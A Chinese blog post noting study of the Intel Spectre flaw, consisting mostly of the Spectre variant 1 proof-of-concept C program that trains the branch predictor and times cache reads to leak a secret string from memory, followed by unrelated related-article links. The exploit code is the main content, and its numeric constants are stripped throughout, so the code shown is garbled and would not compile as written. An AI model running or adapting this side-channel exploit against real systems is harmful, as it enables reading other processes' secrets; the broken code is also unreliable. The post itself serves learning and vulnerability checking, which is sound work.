这几天报道了Intel的漏洞,这里学习一下并做个记录。

报告:https://spectreattack.com/spectre.pdf

 #include <stdio.h>

 #include <stdlib.h>

 #include <stdint.h>

 #include <string.h>

 #ifdef _MSC_VER        //编译器根据版本自动调用lib库

 #include <intrin.h>        //用于内核编程

 #pragma optimize("gt", on)    //允许全局优化和指定更短的机器代码序列,on是打开功能

 #else

 #include <x86intrin.h>

 #endif

 unsigned int array1_size = ;

 uint8_t unused1[];

 uint8_t array1[] = {,,,,,,,,,,,,,,,};

 uint8_t unused2[];

 uint8_t array2[ * ];

 char * secret = "The Magic Words are QKSword";        //插入内核的字符串

 uint8_t temp = ; /* Used so compiler won’t optimize out victim_function() */

 void victim_function(size_t x)

 {

     if (x < array1_size)

     {

         temp &= array2[array1[x] * ];

     }

 }

 /********************************************************************

 Analysis code

 ********************************************************************/

 #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

                                /* Report best guess in value[0] and runner-up in value[1] */

 void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])

 {

     static int results[];

     int tries, i, j, k, mix_i;

     unsigned int junk = ;

     size_t training_x, x;

     register uint64_t time1, time2;

     volatile uint8_t * addr;

     for (i = ; i < ; i++)

         results[i] = ;

     for (tries = ; tries > ; tries--)

     {

         /* Flush array2[256*(0..255)] from cache */

         for (i = ; i < ; i++)

             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */

                                             /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */

         training_x = tries % array1_size;

         for (j = ; j >= ; j--) {

             _mm_clflush(&array1_size);

             for (volatile int z = ; z < ; z++) {} /* Delay (can also mfence) */

                                                         /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */

                                                         /* Avoid jumps in case those tip off the branch predictor */

             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

             x = (x | (x >> )); /* Set x=-1 if j&6=0, else x=0 */

             x = training_x ^ (x & (malicious_x ^ training_x));

             /* Call the victim! */

             victim_function(x);

         }

         /* Time reads. Order is lightly mixed up to prevent stride prediction */

         for (i = ; i < ; i++)

         {

             mix_i = ((i * ) + ) & ;

             addr = &array2[mix_i * ];

             time1 = __rdtscp(&junk); /* READ TIMER */

             junk = *addr; /* MEMORY ACCESS TO TIME */

             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                 results[mix_i]++; /* cache hit - add +1 to score for this value */

         }

         /* Locate highest & second-highest results results tallies in j/k */

         j = k = -;

         for (i = ; i < ; i++)

         {

             if (j <  || results[i] >= results[j])

             {

                 k = j;

                 j = i;

             }

             else if (k <  || results[i] >= results[k])

             {

                 k = i;

             }

         }

         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

     }

     results[] ^= junk; /* use junk so code above won’t get optimized out*/

     value[] = (uint8_t)j;

     score[] = results[j];

     value[] = (uint8_t)k;

     score[] = results[k];

 }

 int main(int argc, const char * * argv)

 {

     printf("Putting '%s' in memory\n", secret);

     size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */

     int i, score[], len = strlen(secret);

     uint8_t value[];

     for (i = ; i < sizeof(array2); i++)

         array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */

     if (argc == )

     {

         sscanf_s(argv[], "%p", (void * *)(&malicious_x));

         malicious_x -= (size_t)array1; /* Convert input value into a pointer */

         sscanf_s(argv[], "%d", &len);

     }

     printf("Reading %d bytes:\n", len);

     while (--len >= )

     {

         printf("Reading at malicious_x = %p... ", (void *)malicious_x);

         readMemoryByte(malicious_x++, value, score);        //读取写入的字符串

         printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));

         printf("0x%02X=’%c’ score=%d ", value[],

             (value[] >  && value[] <  ? value[] : '?'), score[]);

         if (score[] > )

             printf("(second best: 0x%02X score=%d)", value[], score[]);

         printf("\n");

     }

     system("pause");

     return ();

 }

这个程序的主要功能就是把一段字符串写入内核中,然后通过漏洞读取出来,用来检测电脑是否存在漏洞。

代码还没全部注释完,这里先放一下,以免忘记

关于Intel漏洞的学习的更多相关文章

  1. [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇

    目录 [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇 格式化输出函数 printf函数族功能介绍 printf参数 type(类型) flags(标志) number(宽度) precisi ...

  2. [Web安全] XXE漏洞攻防学习(中)

    0x00.XXE漏洞攻击实例 攻击思路: 1. 引用外部实体远程文件读取 2. Blind XXE 3. Dos 0x01.外部实体引用,有回显 实验操作平台:bWAPP平台上的XXE题目 题目: 进 ...

  3. Linux kernel pwn notes(内核漏洞利用学习)

    前言 对这段时间学习的 linux 内核中的一些简单的利用技术做一个记录,如有差错,请见谅. 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了 ...

  4. CVE-2018-2628 weblogic WLS反序列化漏洞--RCE学习笔记

    weblogic WLS 反序列化漏洞学习 鸣谢 感谢POC和分析文档的作者-绿盟大佬=>liaoxinxi:感谢群内各位大佬及时传播了分析文档,我才有幸能看到. 漏洞简介 漏洞威胁:RCE-- ...

  5. 微软 IIS HTTP.sys漏洞原理学习以及POC

    零.MS15-034POC核心部分(参考巡风): socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket. ...

  6. dedecms_v5.7的apache文件名解析漏洞的学习

    0x00 Apache文件名解析漏洞 Apache是一个Web服务器,可以提供web服务.配合java中间件.PHP实现动态页面访问. Apache和PHP通过接口接入后,Apache接受用户的请求, ...

  7. Intel汇编语言程序设计学习-第一章 基本概念

    第一章基本概念 1.1  简单介绍 本书着重讲述MS-Windows平台上IA-32(Intel Architecture 32bit,英特尔32位体系架构)兼容微处理器的汇编语言程序设计,可以使用I ...

  8. Intel汇编语言程序设计学习笔记1

    第一章 汇编器链接器:汇编器将汇编语言翻译成机器语言,链接器将单个文件合并为可执行文件 intel 80X86系列处理器的汇编语言与VAX或者motorala 68x00等系统的汇编是否相同?不相同, ...

  9. xxe漏洞的学习与利用总结

    前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识. xml基础知识 要了解xxe漏洞,那么一定得先 ...

随机推荐

  1. golang dlv 远程调试

    因为不知道delvel 是如何设置源码的,本地编译的上传到服务器上,服务器要调试看不到源码,很是忧伤,所以干脆使用远程调试吧: 在服务器上 ps x|grep game 查找到gameserver的进 ...

  2. C# CountdownEvent实现

    关于CountdownEvent网上的介绍比较少,因为它是实现和使用都很简单,先看看网上的一些评论吧: CountDownEvent调用成员函数Wait()将阻塞,直至成员函数Signal() 被调用 ...

  3. linux 压缩当前文件夹下所有文件

    linux zip压缩.压缩当前文件夹下所有文件,压缩为a.zip.命令行的方法是怎样. zip  -r fileName.zip  文件夹名 tar tar命令可以用来压缩打包单文件.多个文件.单个 ...

  4. git变慢的原因

    最近使用git更新代码变慢,进一步试了一下提交代码.执行git命令都很慢,换了idea的工作目录.更换git版本,所有操作都是徒劳. 最后关了火绒杀毒软件,才快了起来. 坑坑坑坑坑的火绒杀毒!浪费我至 ...

  5. C# string 是不可变的,指什么不可变

    String 表示文本,即一系列 Unicode 字符.字符串是 Unicode 字符的有序集合,用于表示文本.String 对象是 System.Char 对象的有序集合,用于表示字符串.Strin ...

  6. Linux-进程描述符 task_struct 详解

    为了描述控制进程的运行,系统中存放进程的管理和控制信息的数据结构称为进程控制块 PCB(Process Control Block),它是进程实体的一部分,是操作系统中最重要的记录性数据结构.它是进程 ...

  7. 《Java 9 揭秘》全目录汇总

    Tips 做一个终身学习的人. 当写这篇文章时,关于Java 9的学习就先告一段落了. 首先介绍一下背景,大概两个月前,我突然有兴趣想看看Java 9,当时读了一本英文原著<Java 9 Rev ...

  8. mysql 按照月份自动创建表,以年和月为表明,动态生成。

    需求:mysql5.5 数据库,想要根据月份自动创建表,每个月创建一张表,需要数据库自动创建,并根据当前年和月动态生成表名称. 解决办法:1 连接数据库工具为Navicat  2  首先创建存储过程, ...

  9. Python中_,__,__xx__的区别

    _xx 单下划线开头 Python中没有真正的私有属性或方法,可以在你想声明为私有的方法和属性前加上单下划线,以提示该属性和方法不应在外部调用.如果真的调用了也不会出错,但不符合规范. #! /usr ...

  10. Win10 15063 开始运行不保存历史记录原因和解决方法

    http://www.ampc8.com/thread-23421-1-1.html 在Win10 1703的时候你也许会发现开始运行以后,再次打开就没有任何历史记录了,常规方法是桌面-右键-个性化- ...